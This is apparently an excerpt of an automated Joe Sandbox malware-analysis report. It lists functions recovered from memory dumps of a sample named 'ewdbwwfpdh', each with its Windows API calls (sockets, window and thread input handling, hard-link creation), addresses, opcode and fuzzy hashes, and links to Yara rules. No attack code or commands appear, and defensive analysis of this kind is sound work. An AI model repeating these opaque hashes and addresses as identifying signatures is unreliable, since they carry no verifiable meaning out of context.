                                                                                                    • Opcode ID: 2978c1dce115e25b5f32946abb753eedd2baec30f417f5c776c4751e00e15f25
                                                                                                    • Instruction ID: 09d95045161d0e9f56d731f09bc3cc0340513975204184bd4dc7d9410d122299
                                                                                                    • Opcode Fuzzy Hash: 2978c1dce115e25b5f32946abb753eedd2baec30f417f5c776c4751e00e15f25
                                                                                                    • Instruction Fuzzy Hash: 5E810971A00209EFCB05DFD4C984EEEB7B9FF89315F204599E506AB250DB71AE46CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001F2433 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 001F245A
                                                                                                    • WSAGetLastError.WSOCK32 ref: 001F2468
                                                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 001F24E7
                                                                                                    • WSAGetLastError.WSOCK32 ref: 001F24F1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$socket
                                                                                                    • String ID:
                                                                                                    • API String ID: 1881357543-0
                                                                                                    • Opcode ID: 4313dce0d3f4d2fb399a7c51287da911464d767e58fa08b63997a992ada73127
                                                                                                    • Instruction ID: 5c95e96ce26a143c7d2cab14cf62ab8590369bceb95dc1f048262850c979468b
                                                                                                    • Opcode Fuzzy Hash: 4313dce0d3f4d2fb399a7c51287da911464d767e58fa08b63997a992ada73127
                                                                                                    • Instruction Fuzzy Hash: 0B41B375600200AFE720AF24C896F7A77E5AB14718F54C488FA199F2D3D772ED42CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00206BD7 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00206C41
                                                                                                    • ScreenToClient.USER32(?,?), ref: 00206C74
                                                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00206CE1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ClientMoveRectScreen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3880355969-0
                                                                                                    • Opcode ID: 9dc5f4593c4667930eb4815c8f89829fedc4a5e5a97508d52372fbb5d15cefba
                                                                                                    • Instruction ID: c85aafbc3e6e35542ac88c3bfc0319ae1b3b0a3b5cc1896c1eb716d5d0e0b925
                                                                                                    • Opcode Fuzzy Hash: 9dc5f4593c4667930eb4815c8f89829fedc4a5e5a97508d52372fbb5d15cefba
                                                                                                    • Instruction Fuzzy Hash: A1516174A10209EFDF14CF54D9889AE7BB5FF45360F208159F8659B2A1D730EDA1CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001E6033 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 001E60DD
                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 001E6103
                                                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 001E6128
                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 001E6154
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 3321077145-0
                                                                                                    • Opcode ID: 41e2a800184c73074952503037766e333785f33ae89a28f1a131e26175e5c952
                                                                                                    • Instruction ID: b78ad3c09e591c99e04b085c0613385ab5ff88b39abdedf1ccef64410e897bae
                                                                                                    • Opcode Fuzzy Hash: 41e2a800184c73074952503037766e333785f33ae89a28f1a131e26175e5c952
                                                                                                    • Instruction Fuzzy Hash: BA414E39600650DFCB11EF15C458A5EBBF2EFA9754B19C488E84A9B362CB30FD41CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00202039 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetForegroundWindow.USER32 ref: 0020204A
                                                                                                      • Part of subcall function 001D42CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 001D42E6
                                                                                                      • Part of subcall function 001D42CC: GetCurrentThreadId.KERNEL32 ref: 001D42ED
                                                                                                      • Part of subcall function 001D42CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001D2E43), ref: 001D42F4
                                                                                                    • GetCaretPos.USER32(?), ref: 0020205E
                                                                                                    • ClientToScreen.USER32(00000000,?), ref: 002020AB
                                                                                                    • GetForegroundWindow.USER32 ref: 002020B1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2759813231-0
                                                                                                    • Opcode ID: 810a053dd438816871e9025118ffe27c01ad60321ce720314750d882c52c921c
                                                                                                    • Instruction ID: 28017be116ce4f99aeb25b80a165086d661804be7dc8bcc762d689a6416af20c
                                                                                                    • Opcode Fuzzy Hash: 810a053dd438816871e9025118ffe27c01ad60321ce720314750d882c52c921c
                                                                                                    • Instruction Fuzzy Hash: 7E314371D00209AFC704EFA6C885CAEB7F9EF58304B1084AAE419E7252D771DE05CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001DE7C1 Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00174154: _wcslen.LIBCMT ref: 00174159
                                                                                                    • _wcslen.LIBCMT ref: 001DE7F7
                                                                                                    • _wcslen.LIBCMT ref: 001DE80E
                                                                                                    • _wcslen.LIBCMT ref: 001DE839
                                                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 001DE844
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$ExtentPoint32Text
                                                                                                    • String ID:
                                                                                                    • API String ID: 3763101759-0
                                                                                                    • Opcode ID: a21f4f5d6db58abb952c6e030649a3b921fa13def5c62b0d8c590a29d0931c75
                                                                                                    • Instruction ID: 081372788e4bea61641d3c0aec3b217df5e57de1e7542d0b2ecf3dcafac6a282
                                                                                                    • Opcode Fuzzy Hash: a21f4f5d6db58abb952c6e030649a3b921fa13def5c62b0d8c590a29d0931c75
                                                                                                    • Instruction Fuzzy Hash: FD218171D00214AFDB11EFA8D981BAEB7F8EF55760F1440A5E904AF385D7709E418BA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001D8184 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 001D960C: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,001D8199,?,000000FF,?,001D8FE3,00000000,?,0000001C,?,?), ref: 001D961B
                                                                                                      • Part of subcall function 001D960C: lstrcpyW.KERNEL32(00000000,?), ref: 001D9641
                                                                                                      • Part of subcall function 001D960C: lstrcmpiW.KERNEL32(00000000,?,001D8199,?,000000FF,?,001D8FE3,00000000,?,0000001C,?,?), ref: 001D9672
                                                                                                    • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,001D8FE3,00000000,?,0000001C,?,?,00000000), ref: 001D81B2
                                                                                                    • lstrcpyW.KERNEL32(00000000,?), ref: 001D81D8
                                                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,001D8FE3,00000000,?,0000001C,?,?,00000000), ref: 001D8213
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                                                    • String ID: cdecl
                                                                                                    • API String ID: 4031866154-3896280584
                                                                                                    • Opcode ID: 0f4a3ee63776405ce16c5fd01fa1bca3698cd5e19b5249e9dd8231f889e20adf
                                                                                                    • Instruction ID: c5077bf9ab12c9c7eba82e98fc7aa687966b2cfb613e6b228d238fe0a5aa3b74
                                                                                                    • Opcode Fuzzy Hash: 0f4a3ee63776405ce16c5fd01fa1bca3698cd5e19b5249e9dd8231f889e20adf
                                                                                                    • Instruction Fuzzy Hash: EE11D37A200351ABCB156F78D849A7A77B9FF99750B50402AF906CB390EF31D811C790
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00208621 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0020866A
                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00208689
                                                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 002086A1
                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,001EC10A,00000000), ref: 002086CA
                                                                                                      • Part of subcall function 00172441: GetWindowLongW.USER32(00000000,000000EB), ref: 00172452
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Long
                                                                                                    • String ID:
                                                                                                    • API String ID: 847901565-0
                                                                                                    • Opcode ID: bff56e8e7f6e661a5c49ae208435173cb1f6c475b7e77dfdce8907e6b4826f2a
                                                                                                    • Instruction ID: ad52256694e5fb55075d0e27812f0c34d11845f27f3701735fc593cb573a2c4b
                                                                                                    • Opcode Fuzzy Hash: bff56e8e7f6e661a5c49ae208435173cb1f6c475b7e77dfdce8907e6b4826f2a
                                                                                                    • Instruction Fuzzy Hash: 9811A231921325AFCB118F69EC08A6B3BA9AB45370F224724F979D72F1DB319921CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001A2099 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 47f4ca072741a5af61157618e07048d1f398a35dd89077178b2e4667dc7fdbb5
                                                                                                    • Instruction ID: 13b393c401705f368967bceff3831a36936a20648386d2445fca85c0a77cb10a
                                                                                                    • Opcode Fuzzy Hash: 47f4ca072741a5af61157618e07048d1f398a35dd89077178b2e4667dc7fdbb5
                                                                                                    • Instruction Fuzzy Hash: 68018FBA6096157EE72126BC7CC5F27665DDF533B8B310325F621A11D2DB748C414560
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001D22B7 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 001D22D7
                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001D22E9
                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001D22FF
                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001D231A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3850602802-0
                                                                                                    • Opcode ID: 3f506b9733790e5985326a1af75c2ea0c8a86eb892f9a27eef3b49661ac46cf4
                                                                                                    • Instruction ID: 1c6a6e19c747f4ac4421d166a667d3361eff4b95b7fdd0b58aeb68da6d7cef32
                                                                                                    • Opcode Fuzzy Hash: 3f506b9733790e5985326a1af75c2ea0c8a86eb892f9a27eef3b49661ac46cf4
                                                                                                    • Instruction Fuzzy Hash: AE11F73A901228FFEB119BA5C985F9DBBB8FB18750F210092EA10B7290D7716E10DB94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0020A852 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00172441: GetWindowLongW.USER32(00000000,000000EB), ref: 00172452
                                                                                                    • GetClientRect.USER32(?,?), ref: 0020A890
                                                                                                    • GetCursorPos.USER32(?), ref: 0020A89A
                                                                                                    • ScreenToClient.USER32(?,?), ref: 0020A8A5
                                                                                                    • DefDlgProcW.USER32(?,00000020,?,00000000,?), ref: 0020A8D9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 4127811313-0
                                                                                                    • Opcode ID: c2a4ee59ba002e97767c2751912efa1f370966ab25832283be8d11b1dd3aad47
                                                                                                    • Instruction ID: 61eaa0fc485789a0548f30423c1d2ed845fde34772ecb42fadbe9fe10a9683fc
                                                                                                    • Opcode Fuzzy Hash: c2a4ee59ba002e97767c2751912efa1f370966ab25832283be8d11b1dd3aad47
                                                                                                    • Instruction Fuzzy Hash: B4110A7191121AEFDF14DF94E8499EE77B8EB05300F508455F912E3192D730BAA2CBA2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001DEA02 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 001DEA29
                                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 001DEA5C
                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 001DEA72
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 001DEA79
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 2880819207-0
                                                                                                    • Opcode ID: 3fb91d18d70586cde2b26125980e1ec0a98fe21a46c626045288279107807e4f
                                                                                                    • Instruction ID: 26d00644eecde96fe714831d866c019661f5d2aad437681318569d9ae3b637e2
                                                                                                    • Opcode Fuzzy Hash: 3fb91d18d70586cde2b26125980e1ec0a98fe21a46c626045288279107807e4f
                                                                                                    • Instruction Fuzzy Hash: 2411087A900259BBCB01AFA8AC09A9B7FBDAB46311F004256F825E7391D7748D0487A0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00208773 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00208792
                                                                                                    • ScreenToClient.USER32(?,?), ref: 002087AA
                                                                                                    • ScreenToClient.USER32(?,?), ref: 002087CE
                                                                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 002087E9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 357397906-0
                                                                                                    • Opcode ID: 36148cf45aff2e18cca8dffca9336fe9a152f422cc1c8dd77a50a51e755dc7c2
                                                                                                    • Instruction ID: 4cf2bba9c4c1e11474186c2f0a8c4d66377df0075ea80e17b3c4e5b9c58266fd
                                                                                                    • Opcode Fuzzy Hash: 36148cf45aff2e18cca8dffca9336fe9a152f422cc1c8dd77a50a51e755dc7c2
                                                                                                    • Instruction Fuzzy Hash: 041144B9D0120AEFDB41CF98D8849EEBBF9FB08310F104166E915E3211D735AA54CF50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00172150 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetSysColor.USER32(00000008), ref: 0017216C
                                                                                                    • SetTextColor.GDI32(?,?), ref: 00172176
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00172189
                                                                                                    • GetStockObject.GDI32(00000005), ref: 00172191
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$ModeObjectStockText
                                                                                                    • String ID:
                                                                                                    • API String ID: 4037423528-0
                                                                                                    • Opcode ID: 77c192a1ce4addfeae1759ccfe7ac2ed904f93fee2cd8880cc8bf1c27709c015
                                                                                                    • Instruction ID: 696c39e34ce6f37372a86fc6534bed421977de435e85f78980b2a5508319a5af
                                                                                                    • Opcode Fuzzy Hash: 77c192a1ce4addfeae1759ccfe7ac2ed904f93fee2cd8880cc8bf1c27709c015
                                                                                                    • Instruction Fuzzy Hash: 61E06D31281740AEDB215BB4BC0DBE8BB60AB12336F04C219F6BE880E2C77246519B10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001CEBD6 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDesktopWindow.USER32 ref: 001CEBD6
                                                                                                    • GetDC.USER32(00000000), ref: 001CEBE0
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 001CEC00
                                                                                                    • ReleaseDC.USER32(?), ref: 001CEC21
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2889604237-0
                                                                                                    • Opcode ID: 6af71a6eb53714bae9577f4df527294dded3c59e22f834fcb24672fa49808ed0
